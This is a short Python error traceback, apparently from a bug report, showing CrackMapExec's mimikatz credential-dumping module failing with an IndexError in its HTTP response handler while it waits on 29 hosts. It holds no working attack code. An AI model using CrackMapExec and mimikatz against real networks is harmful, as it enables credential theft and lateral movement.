File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle | |
self.handle_one_request() | |
File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request | |
method() | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/servers/http.py", line 28, in do_POST | |
self.server.module.on_response(self.server.context, self) | |
File "/usr/lib/python2.7/site-packages/crackmapexec-4.0.0.dev0-py2.7.egg/cme/modules/mimikatz.py", line 198, in on_response | |
hostid = context.db.get_computers(response.client_address[0])[0][0] | |
IndexError: list index out of range | |
---------------------------------------- | |
MIMIKATZ [*] Waiting on 29 host(s) | |
MIMIKATZ [*] Waiting on 29 host(s) |